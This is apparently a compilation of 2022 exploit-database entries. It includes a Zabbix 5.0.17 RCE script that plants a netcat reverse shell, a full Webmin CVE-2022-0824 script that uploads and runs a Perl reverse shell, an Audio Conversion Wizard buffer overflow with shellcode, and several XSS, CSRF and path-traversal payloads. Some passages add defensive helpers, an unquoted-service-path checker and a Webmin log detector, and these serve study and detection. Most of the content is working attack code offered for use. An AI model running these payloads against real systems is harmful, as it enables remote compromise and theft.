    "enter": "Sign+in"
}
proxies = {
    'http': 'http://127.0.0.1:8080'
}

r = s.post(url + "/index.php", data=data)  # proxies=proxies)
if "Sign out" not in r.text:
    print(Fore.RED + "[!] Authentication failed")
    sys.exit(-1)
if "Zabbix 5.0.17" not in r.text:
    print(Fore.RED + "[!] This is not Zabbix 5.0.17")
    sys.exit(-1)

if "filter_hostids%5B0%5D=" in r.text:
    try:
        x = re.search('filter_hostids%5B0%5D=(.*?)"', r.text)
        hostId = x.group(1)
    except Exception:
        print(Fore.RED + "[!] Exploit failed to resolve HostID")
        print(Fore.BLUE + "[?] you can find it under /items then add item")
        sys.exit(-1)
else:
    print(Fore.RED + "[!] Exploit failed to resolve HostID")
    print(Fore.BLUE + "[?] you can find HostID under /items then add item")
    sys.exit(-1)

sid = re.search('<meta name="csrf-token" content="(.*)"/>', r.text).group(1)  # hidden_csrf_token

command = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {host} {port} >/tmp/f"
payload = f"system.run[{command},nowait]"
Random_name = item_name()

# Item-creation form of items.php: a "Zabbix agent" item (type 0) whose key is the
# system.run command, polled every minute.
data2 = {
    "sid": sid, "form_refresh": "1", "form": "create", "hostid": hostId, "selectedInterfaceId": "0",
    "name": Random_name, "type": "0", "key": payload, "url": "", "query_fields[name][1]": "",
    "query_fields[value][1]": "", "timeout": "3s", "post_type": "0", "posts": "",
    "headers[name][1]": "", "headers[value][1]": "", "status_codes": "200", "follow_redirects": "1",
    "retrieve_mode": "0", "http_proxy": "", "http_username": "", "http_password": "",
    "ssl_cert_file": "", "ssl_key_file": "", "ssl_key_password": "", "interfaceid": "1",
    "params_es": "", "params_ap": "", "params_f": "", "value_type": "3", "units": "", "delay": "1m",
    "delay_flex[0][type]": "0", "delay_flex[0][delay]": "", "delay_flex[0][schedule]": "",
    "delay_flex[0][period]": "", "history_mode": "1", "history": "90d", "trends_mode": "1",
    "trends": "365d", "valuemapid": "0", "new_application": "", "applications[]": "0",
    "inventory_link": "0", "description": "", "status": "0", "add": "Add"
}
r2 = s.post(url + "/items.php", data=data2, headers=headers, cookies={"tab": "0"})
# A single-page item list has no "?page=" links at all, so treat 0 as one page.
no_pages = max(1, r2.text.count("?page="))

#################################################[Searching in all pages for the uploaded item]#################################################
page = 1
flag = False
itemId = None
while page <= no_pages:
    r_page = s.get(url + f"/items.php?page={page}", headers=headers)
    if Random_name in r_page.text:
        print(Fore.GREEN + "[+] the payload has been Uploaded Successfully")
        x2 = re.search(rf"(\d+)[^\d]>{Random_name}", r_page.text)
        if x2:
            itemId = x2.group(1)
        print(Fore.GREEN + f"[+] you should find it at {url}/items.php?form=update&hostid={hostId}&itemid={itemId}")
        flag = True
        break
    else:
        page += 1

if not flag:
    print(Fore.BLUE + "[?] do you know you can't upload same key twice ?")
    print(Fore.BLUE + "[?] maybe it is already uploaded so set the listener and wait 1m")
    print(Fore.BLUE + "[*] change the port and try again")
    sys.exit(-1)

if itemId is None:
    print(Fore.RED + "[!] item created but its id could not be parsed; trigger 'Execute now' by hand or wait for the 1m poll")
    sys.exit(-1)

#################################################[Executing the item]#################################################
data2["form"] = "update"
data2["selectedInterfaceId"] = "1"
data2["check_now"] = "Execute+now"
data2.pop("add", None)
data2["itemid"] = itemId
print(Fore.GREEN + f"[+] set the listener at {port} please...")
r2 = s.post(url + "/items.php", data=data2, headers=headers, cookies={"tab": "0"})  # ,proxies=proxies )
print(Fore.BLUE + "[?] note : it takes up to +1 min so be patient :)")
answer = input(Fore.BLUE + "[+] got a shell ? [y]es/[N]o: ")
if "y" in answer.lower():
    print(Fore.GREEN + "Nice !")
else:
    print(Fore.RED + "[!] if you find out why please contact me ")
sys.exit(0)

ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)

# Exploit Title: ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)
# Exploit Author: LiquidWorm

Vendor: Integrated Control Technology Ltd.
Product web page: https://www.ict.co
Affected version: GX: Ver: 2.08.1002 K1B3
                      Lib: 04.00.217
                      Int: 2.3.235.J013
                      OS: 2.0.20
                  WX: Ver: 4.00 284 H062
                      App: 02.08.766
                      Lib: 04.00.169
                      Int: 02.2.208

Summary: Protege GX is an enterprise level integrated access control, intrusion detection and building automation solution with a feature set that is easy to operate, simple to integrate and effortless to extend. Protege WX is an all-in-one, web-based, cross-platform system that gives you a fully functional access control and intrusion detection solution in a fraction of the time of conventional software. With no software to install, setup is quick and simple. Connect the Controller and system components, then open a web browser to launch the intuitive wizard-driven interface which guides you through the process of configuring your system.

Desc: The application suffers from an authenticated stored XSS vulnerability. The issue is triggered when input passed to the 'Name' parameter is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Tested on: Microsoft-WinCE/6.00

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2022-5699
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5699.php

08.02.2022

--

UI navigation:
--------------
Scheduling > Daylight Savings > (Name field).

Decrypted POST request:
-----------------------
POST /daylightsaving.htm

Command&Type=Submit&SubType=GXT_DAYLIGHTSAVINGS_TBL&DaylightSavingId=1&action=update&Name=ZSL%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&StartMonth=10&EndMonth=2&StartDay=41&EndDay=41&RecId=1

Encrypted GET request:
----------------------
http://CONTROLLER_IP/PRT_CTRL_DIN_ISAPI.dll?8F7FFABE947FEE9C78850F2BA679A3B1645F6378696B32385B56303C43604B48F8CD082303AADCFCECEA082384C860AB16159DADCD89C9A7A2A47EE1F49A7A98AC9A8572882F88FAE5409CF6E06E04DA7F7D10AA6D45525C62B2A62FD949FF00E6B6B7471010908D9A59FBA1D9F304AD8CB24E0CE317A0870AA5A5253F0FCD58CA2BC874AC002CB62422E184FB9F13161C9C00E08F258B8519578EA2793A0C28A4AF51CF65637C0C2F972CE3F49703214A63AA78B3EBE5C720DBE1E9C97E772334EC95480956E27DB6D1DF4489C5D60CCE27D69B388CA6C69A9DC72D85127F870DDA4E459CA245508EBFD66D1C83D9FA12838C1F426E538D5D75192B57DF5AF6

Additional info:
----------------
Database backup predictable name: Db_D3037E8A_8_Feb_22.bak
The D3037E8A is the serial number of the onboard reader.

Encrypt/Decrypt functions:
--------------------------
The client-side wrapper below is what turns the decrypted POST body into the encrypted GET above: AES-128-CBC (mcrypt "rijndael-128") with the key read from the browser's localStorage ("WXKey"), a 16-character IV drawn from Math.random() and prepended to the ciphertext, the whole thing hex-encoded and prefixed with the SESSID cookie. Because the key and the code both live in the browser, anyone with the session can decrypt and forge requests; treat the layer as transport obfuscation rather than a security boundary, and test against the decrypted form of the request shown above.

From console:
> localStorage.getItem("WXKey")
< '8EDB22D9FB767538'

function encryptAES(a, c) {
    a = a.toString();
    a = unescape(encodeURIComponent(a));
    "undefined" == typeof c && (c = !0);
    if (0 == servertype) return a;
    var b = localStorage.getItem("WXKey");
    if ("" == b || null == b) return a;
    for (var d = "", e = 0; 16 > e; e++) d += String.fromCharCode(Math.floor(75 * Math.random() + 48));
    a = d + mcrypt.Encrypt(addPKCS7(a), d, b, "rijndael-128", "cbc");
    return a = c ? getCookie("SESSID") + strToHex(a) : strToHex(a)
}

function decryptAES(a) {
    if (null == a) return "";
    a = a.toString();
    if ("<invalid session> < Packet not Init and not encrypted. >" == a) a = 0 == servertype ? "login.php" : "login.htm", window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase();
    else if ("<invalid session>" == a.substr(0, 17)) a = 0 == servertype ? "login.php?logout" : "login.htm?logout", window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase();
    else {
        if (0 == servertype) return a;
        var c = localStorage.getItem("WXKey");
        if ("" == c) return a;
        a = hexToStr(a);
        var b = a.substr(0, 16);
        a = a.substr(16, a.length);
        a = mcrypt.Decrypt(a, b, c, "rijndael-128", "cbc").replace(/\x00+$/g, "");
        a = removePKCS7(a);
        return a = decodeURIComponent(escape(a))
    }
}

ProtonVPN 1.26.0 - Unquoted Service Path

# Exploit Title: ProtonVPN 1.26.0 - Unquoted Service Path
# Date: 22/03/2022
# Exploit Author: gemreda (@gemredax)
# Vendor Homepage: https://protonvpn.com/
# Software Link: https://protonvpn.com/
# Version: 1.26.0
# Tested: Windows 10 x64
# Contact: gemredax@pm.me

PS C:\Users\Emre> sc.exe qc "ProtonVPN Wireguard"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ProtonVPN Wireguard
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.WireGuardService.exe C:\ProgramData\ProtonVPN\WireGuard\ProtonVPN.conf
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ProtonVPN WireGuard
        DEPENDENCIES       : Nsi
                           : TcpIp
        SERVICE_START_NAME : LocalSystem

#Exploit:

The product uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path. If a malicious individual has access to the file system, it is possible to elevate privileges by inserting such a file as "C:\Program.exe" to be run by a privileged program making use of WinExec.

Here the unquoted path gives Windows three locations to try before the real binary: C:\Program.exe, C:\Program Files.exe and C:\Program Files (x86)\Proton.exe (the space before the .conf argument comes after the executable and is harmless). Two caveats: the service is DEMAND_START rather than AUTO_START, so a planted binary only runs when the ProtonVPN client, or someone with start permission on the service, starts it, not at boot; and all three parent directories are admin-only on a default installation, so the ACLs must have been loosened for a standard user to exploit this.
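The seven unquoted-service-path entries on this page (Cloudflare WARP, Private Internet Access, Malwarebytes, Foxit, Wondershare, McAfee Safe Connect and ProtonVPN) all rest on the same CreateProcess behaviour, and a reviewer's first question for each is the same: which exact paths would Windows try, and are any of their directories writable? The helper below is an added editorial example, not code from any of the advisories. ADVISORY_PATHS copies the BINARY_PATH_NAME values printed above (the doubled backslash in the Cloudflare capture is normalised); the split rule is documented CreateProcess behaviour, while stopping at the first prefix that already ends in .exe, used to separate the module from its arguments, is this example's own heuristic.

```python
import re

# BINARY_PATH_NAME values as printed by `sc qc` in the advisories on this page.
ADVISORY_PATHS = {
    "CloudflareWARP": r"C:\Program Files\Cloudflare\Cloudflare WARP\warp-svc.exe",
    "PrivateInternetAccessService": r'"C:\Program Files\Private Internet Access\pia-service.exe"',
    "MBAMService": r"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe",
    "FoxitReaderUpdateService": r"C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe",
    "Wondershare InstallAssist": r"C:\ProgramData\Wondershare\Service\InstallAssistService.exe",
    "SafeConnectService": r"C:\Program Files (x86)\McAfee\McAfee Safe Connect\SafeConnect.ServiceHost.exe",
    "ProtonVPN Wireguard": r"C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.WireGuardService.exe C:\ProgramData\ProtonVPN\WireGuard\ProtonVPN.conf",
}


def hijack_candidates(binary_path_name):
    """Executable paths CreateProcess tries *before* the real service binary.

    With no quotes, the command line is split at each run of whitespace and every
    prefix is tried in turn as the module name; a prefix whose last component has
    no extension gets ".exe" appended. A quoted path is resolved exactly, and a
    path without whitespace has nothing to split, so both yield no candidates.
    Treating the first prefix that already ends in ".exe" as the intended binary
    (everything after it being arguments) is this example's heuristic.
    """
    cmd = binary_path_name.strip()
    if not cmd or cmd.startswith('"'):
        return []
    candidates = []
    for match in re.finditer(r"\s+", cmd):
        prefix = cmd[: match.start()]
        if prefix.lower().endswith(".exe"):
            break
        last_component = prefix.rsplit("\\", 1)[-1]
        candidates.append(prefix if "." in last_component else prefix + ".exe")
    return candidates


def hijack_dirs(binary_path_name):
    """Directories whose ACLs decide exploitability, one per candidate, deduplicated."""
    dirs = []
    for cand in hijack_candidates(binary_path_name):
        parent = cand.rsplit("\\", 1)[0]
        if parent.endswith(":"):
            parent += "\\"          # drive root, e.g. C:\
        if parent not in dirs:
            dirs.append(parent)
    return dirs


if __name__ == "__main__":
    for service, path in ADVISORY_PATHS.items():
        cands = hijack_candidates(path)
        print(f"{service}:")
        if not cands:
            print("    no hijack point (quoted, or no whitespace in the path)")
        for c in cands:
            print(f"    would try: {c}")
        for d in hijack_dirs(path):
            # standard users cannot create files in C:\ or under Program Files by default;
            # icacls shows whether that still holds on the target
            print(f"    check ACL: icacls " + (f'"{d}"' if " " in d else d))
```

Run as-is it prints the candidate list for every service on this page, which makes the two non-findings visible at a glance: the PIA path is quoted and the Wondershare path has no whitespace, so neither produces a hijack point. For the rest, the printed `icacls` commands are the check to run on the target before calling the unquoted path a privilege escalation.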
# Exploit Title: Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS)
# Date: 2022-03-22
# Author: Milad karimi
# Software Link: https://www.drupal.org/project/avatar_uploader
# Version: v7.x-1.0-beta8
# Tested on: Windows 10
# CVE: N/A

1. Description:
The avatar_uploader module reflects the file parameter of avatar_uploader.pages.inc into the response without output encoding, so a crafted link executes attacker-supplied script in the context of the Drupal site (reflected cross-site scripting).

2. Proof of Concept:
http://$target/avatar_uploader.pages.inc?file=<script>alert("test")</script>

# Exploit Title: WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF)
# Date: 24-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/curtain/
# Version: 1.0.2
# Tested on: Firefox

## Summary:

A cross-site request forgery vulnerability in the Curtain WordPress plugin allows an attacker who lures a logged-in administrator to a crafted page to activate or deactivate the site's maintenance mode. The settings handler accepts an empty _wpnonce, so the request is processed without a valid nonce.

## Vulnerable URL:

http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=0

## CSRF POC Exploit

```
<html>
  <body>
    <form action="http://localhost:10003/wp-admin/options-general.php">
      <input type="hidden" name="page" value="curtain" />
      <input type="hidden" name="&#95;wpnonce" value="" />
      <input type="hidden" name="mode" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

WordPress Plugin admin-word-count-column 2.2 - Local File Read

# Exploit Title: WordPress Plugin admin-word-count-column 2.2 - Local File Read
# Google Dork: inurl:/wp-content/plugins/admin-word-count-column/
# Date: 27-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/admin-word-count-column/
# Version: 2.2
# Contact me: h [at] spidersilk.com
# PHP version: 5.3.2 or below
# Vulnerable File: plugins/admin-word-count-column/download-csv.php

# Vulnerable Code:

```
<?php
date_default_timezone_set('America/Los_Angeles');
$csvdate = date('Md-H-i-s-T');
$csvname = 'wordcounts-' . $csvdate . '.csv';
header('Content-Type: application/csv');
header('Content-Disposition: attachment; filename=' . $csvname);
header('Pragma: no-cache');
readfile($_GET['path'] . 'cpwc.csv');
?>
```

# Proof of Concept:

localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd%00

Note: The NUL byte (sent URL-encoded as %00) truncates the path so that the appended 'cpwc.csv' suffix is ignored. This only works on PHP versions that still accept NUL bytes in file paths (the advisory lists 5.3.2 and below); on newer PHP the suffix stays attached and only files whose name ends in cpwc.csv can be read, although the path traversal itself remains. The script performs no authentication or capability check, so a direct request to the file is sufficient.

Webmin 1.984 - Remote Code Execution (Authenticated)

# Exploit Title: Webmin 1.984 - Remote Code Execution (Authenticated)
# Date: 2022-03-06
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.webmin.com/
# Software Link: https://github.com/webmin/webmin/archive/refs/tags/1.984.zip
# Version: <= 1.984
# Tested on: Ubuntu 18
# Reference: https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell

#!/usr/bin/python3

"""
Coded by: @faisalfs10x
GitHub: https://github.com/faisalfs10x
Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
"""

import requests
import urllib3
import argparse
import os
import time

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

TGREEN = '\033[32m'
TRED = '\033[31m'
TCYAN = '\033[36m'
TSHELL = '\033[32;1m'
ENDC = '\033[m'


class Exploit(object):

    def __init__(self, target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname):
        self.target = target
        self.username = username
        self.password = password
        self.py3http_server = py3http_server
        self.pyhttp_port = pyhttp_port
        self.upload_path = upload_path
        self.callback_ip = callback_ip
        self.callback_port = callback_port
        self.fname = fname
        #self.proxies = proxies
        self.s = requests.Session()

    def gen_payload(self):
        # Perl reverse shell written to a local file; it is later fetched by the
        # target through the File Manager's "download from URL" feature.
        payload = ('''perl -e 'use Socket;$i="''' + self.callback_ip + '''";$p=''' + self.callback_port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''')
        print(TCYAN + f"\n[+] Generating payload to {self.fname} in current directory", ENDC)
        f = open(f"{self.fname}", "w")
        f.write(payload)
        f.close()

    def login(self):
        login_url = self.target + "/session_login.cgi"
        cookies = {
            "redirect": "1",
            "testing": "1",
            "PHPSESSID": ""
        }
        data = {
            'user': self.username,
            'pass': self.password
        }
        try:
            r = self.s.post(login_url, data=data, cookies=cookies, verify=False, allow_redirects=True, timeout=10)
            success_message = 'System hostname'
            if success_message in r.text:
                print(TGREEN + "[+] Login Successful", ENDC)
            else:
                print(TRED + "[-] Login Failed", ENDC)
                exit()
        except requests.Timeout as e:
            print(TRED + f"[-] Target: {self.target} is not responding, Connection timed out", ENDC)
            exit()

    def pyhttp_server(self):
        print(f'[+] Attempt to host http.server on {self.pyhttp_port}\n')
        os.system(f'(setsid $(which python3) -m http.server {self.pyhttp_port} 0>&1 & ) ')  # add 2>/dev/null for clean up
        print('[+] Sleep 3 second to ensure http server is up!')
        time.sleep(3)  # Sleep for 3 seconds to ensure http server is up!

    def download_remote_url(self):
        # File Manager: fetch a remote URL into upload_path on the Webmin host
        download_url = self.target + "/extensions/file-manager/http_download.cgi?module=filemin"
        headers = {
            "Accept": "application/json, text/javascript, */*; q=0.01",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
            "Referer": self.target + "/filemin/?xnavigation=1"
        }
        data = {
            'link': "http://" + self.py3http_server + "/" + self.fname,
            'username': '',
            'password': '',
            'path': self.upload_path
        }
        r = self.s.post(download_url, data=data, headers=headers, verify=False, allow_redirects=True)
        print(f"\n[+] Fetching {self.fname} from http.server {self.py3http_server}")

    def modify_permission(self):
        # File Manager: chmod the fetched file so miniserv will execute it as a CGI
        modify_perm_url = self.target + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30"
        headers = {
            "Referer": self.target + "/filemin/?xnavigation=1"
        }
        data = {
            "name": self.fname,
            "perms": "0755",
            "applyto": "1",
            "path": self.upload_path
        }
        r = self.s.post(modify_perm_url, data=data, headers=headers, verify=False, allow_redirects=True)
        print(f"[+] Modifying permission of {self.fname} to 0755")

    def exec_revshell(self):
        url = self.target + '/' + self.fname
        try:
            r = self.s.get(url, verify=False, allow_redirects=True, timeout=3)
        except requests.Timeout as e:
            # check target whether make response in 3s, then it indicates shell has been spawned!
            print(TGREEN + f"\n[+] Success: shell spawned to {self.callback_ip} via port {self.callback_port} - XD", ENDC)
            print("[+] Shell location: " + url)
        else:
            print(TRED + f"\n[-] Please setup listener first and try again with: nc -lvp {self.callback_port}", ENDC)

    def do_cleanup(self):
        print(TCYAN + '\n[+] Cleaning up ')
        print(f'[+] Killing: http.server on port {self.pyhttp_port}')
        os.system(f'kill -9 $(lsof -t -i:{self.pyhttp_port})')
        exit()

    def run(self):
        self.gen_payload()
        self.login()
        self.pyhttp_server()
        self.download_remote_url()
        self.modify_permission()
        self.exec_revshell()
        self.do_cleanup()


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Webmin CVE-2022-0824 Reverse Shell')
    parser.add_argument('-t', '--target', type=str, required=True, help=' Target full URL, https://www.webmin.local:10000')
    parser.add_argument('-c', '--credential', type=str, required=True, help=' Format, user:user123')
    parser.add_argument('-LS', '--py3http_server', type=str, required=True, help=' Http server for serving payload, ex 192.168.8.120:8080')
    parser.add_argument('-L', '--callback_ip', type=str, required=True, help=' Callback IP to receive revshell')
    parser.add_argument('-P', '--callback_port', type=str, required=True, help=' Callback port to receive revshell')
    parser.add_argument("-V", '--version', action='version', version='%(prog)s 1.0')

    args = parser.parse_args()
    target = args.target
    username = args.credential.split(':')[0]
    password = args.credential.split(':')[1]
    py3http_server = args.py3http_server
    pyhttp_port = py3http_server.split(':')[1]
    callback_ip = args.callback_ip
    callback_port = args.callback_port
    upload_path = "/usr/share/webmin"  # the default installation of Webmin Debian Package, may be in different location if installed using other method.
    fname = "revshell.cgi"  # CGI script name, you may change to different name

    pwn = Exploit(target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname)
    pwn.run()
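The exploit above leaves a distinctive three-step trail in Webmin's access log: a POST to the File Manager's http_download.cgi, a POST to chmod.cgi, and then a GET for a brand-new .cgi directly under the web root. The following detector is an added example, not part of faisalfs10x's script or of Webmin; it runs over constructed log lines in the Common Log Format that miniserv writes to miniserv.log (assumed here; check the format on your own host) and flags a source that completes the chain in order within a time window.

```python
"""Added example (not from the exploit or from Webmin): flag the
http_download.cgi -> chmod.cgi -> GET /<new>.cgi chain in miniserv-style logs."""
import re
from collections import defaultdict
from datetime import datetime

WINDOW = 300  # seconds allowed between the download and the execution request

# Constructed sample log, not a real capture: one attack session (admin) and
# one benign session (alice) that only uses chmod.
SAMPLE_LOG = """\
10.0.0.5 - admin [06/Mar/2022:10:01:02 +0000] "POST /session_login.cgi HTTP/1.1" 302 0
10.0.0.5 - admin [06/Mar/2022:10:01:09 +0000] "GET /filemin/?xnavigation=1 HTTP/1.1" 200 5321
10.0.0.5 - admin [06/Mar/2022:10:01:20 +0000] "POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1" 200 73
10.0.0.5 - admin [06/Mar/2022:10:01:24 +0000] "POST /extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30 HTTP/1.1" 302 0
10.0.0.5 - admin [06/Mar/2022:10:01:28 +0000] "GET /revshell.cgi HTTP/1.1" 200 0
10.0.0.9 - alice [06/Mar/2022:10:05:00 +0000] "GET /filemin/?xnavigation=1 HTTP/1.1" 200 5321
10.0.0.9 - alice [06/Mar/2022:10:05:30 +0000] "POST /extensions/file-manager/chmod.cgi?module=filemin HTTP/1.1" 302 0
"""

# host ident user [timestamp] "METHOD path protocol" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The three stages of the chain, in the order they must occur.
STAGES = (
    ("download", "POST", re.compile(r"^/extensions/file-manager/http_download\.cgi")),
    ("chmod",    "POST", re.compile(r"^/extensions/file-manager/chmod\.cgi")),
    ("exec",     "GET",  re.compile(r"^/[^/?]+\.cgi$")),  # a .cgi directly under the web root
)

def parse_line(line):
    """Parse one CLF line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def classify(rec):
    """Return the stage name a request belongs to, or None."""
    for name, method, pattern in STAGES:
        if rec["method"] == method and pattern.match(rec["path"]):
            return name
    return None

def find_chains(log_text, window=WINDOW):
    """Return (ip, user, executed_path) for every source that performs
    download -> chmod -> exec in that order within `window` seconds."""
    state = defaultdict(dict)  # (ip, user) -> {stage: timestamp}
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stage = classify(rec)
        if stage is None:
            continue
        key = (rec["ip"], rec["user"])
        seen = state[key]
        if stage == "download":
            seen.clear()
            seen["download"] = rec["ts"]
        elif stage == "chmod" and "download" in seen:
            seen["chmod"] = rec["ts"]
        elif stage == "exec" and "chmod" in seen:
            if (rec["ts"] - seen["download"]).total_seconds() <= window:
                hits.append((rec["ip"], rec["user"], rec["path"]))
            seen.clear()
    return hits

if __name__ == "__main__":
    for ip, user, path in find_chains(SAMPLE_LOG):
        print(f"[!] {user}@{ip}: remote download -> chmod -> GET {path}")
```

The order requirement is what keeps the false-positive rate down: administrators do chmod files and do fetch remote URLs, but rarely request a freshly uploaded .cgi from the root a few seconds later. Pair the alert with a file-integrity check on the Webmin root (the script drops revshell.cgi in /usr/share/webmin by default).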

Cobian Backup 0.9 - Unquoted Service Path

# Exploit Title: Cobian Backup 0.9 - Unquoted Service Path
# Date: 06/03/2022
# Exploit Author: Hejap Zairy
# Vendor Homepage: https://www.cobiansoft.com/
# Software Link: https://www.cobiansoft.com/download.php/
# Version: 0.9.93
# Tested: Windows 10 Pro x64 es

C:\Users\Hejap>sc qc CobianReflectorService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: CobianReflectorService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Cobian Reflector\Cobian.Reflector.Service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Cobian Reflector Engine
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt requires the local user to be able to place an executable at one of the paths Windows tries before the real binary, here C:\Program.exe or C:\Program Files\Cobian.exe, without being stopped by the OS or other security software. Because the service is AUTO_START and runs as LocalSystem, the planted file is executed with SYSTEM privileges at the next reboot or service restart. On a default installation standard users cannot create files in C:\ or C:\Program Files, so check the ACLs of those directories before reporting this as exploitable.

Audio Conversion Wizard v2.01 - Buffer Overflow

# Exploit Title: Audio Conversion Wizard v2.01 - Buffer Overflow
# Exploit Author: Hejap Zairy
# Date: 03.07.2022
# Software Link: https://www.litexmedia.com/acwizard.exe
# Tested Version: v2.01
# Tested on: Windows 10 64bit

# 1.- Run python code : 0day-Hejap_Zairy.py
# 2.- Open 0day_Hejap.txt and copy All content to Clipboard
# 3.- Open Audio Conversion Wizard and press Enter Code
# 4.- Paste the Content of 0day_Hejap.txt into the 'Enter Code' field
# 5.- Click 'OK'

# Author Code By Hejap Zairy

#!/usr/bin/env python
# Python 2: str and bytes concatenate freely below
from pwn import *

buffer = "\x41" * 1016                 # junk up to the saved return address
push_esp = p32(0x1004dbff)             # push esp ; ret  (id3lib.dll)
nops = "\x90" * 15                     # short NOP sled before the shellcode

# msfvenom --arch x64 windows/x64/shell_reverse_tcp lhost=ip lport=443 -f python -e x64/shikata_ga_nai -b "\x00\x0a\x0d\x20"
# msfvenom --arch x64 -p windows/x64/messagebox TEXT="0day Hejap Zairy" -f python -e x64/shikata_ga_nai EXITFUNC=thread -b "\x00\x0a\x0d\x20"
# Note: the bytes below are the raw windows/x64/messagebox payload and still
# contain \x00, so they were not encoded with the bad-character list above.
buf = b""
buf += b"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00"
buf += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b"
buf += b"\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e"
buf += b"\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
buf += b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9"
buf += b"\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52"
buf += b"\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00"
buf += b"\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b"
buf += b"\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48"
buf += b"\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
buf += b"\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6"
buf += b"\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b"
buf += b"\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
buf += b"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41"
buf += b"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0"
buf += b"\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff"
buf += b"\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a"
buf += b"\x01\x00\x00\x3e\x4c\x8d\x85\x2b\x01\x00\x00\x48\x31"
buf += b"\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\xbb\xe0\x1d\x2a"
buf += b"\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28"
buf += b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72"
buf += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x30\x64\x61\x79"
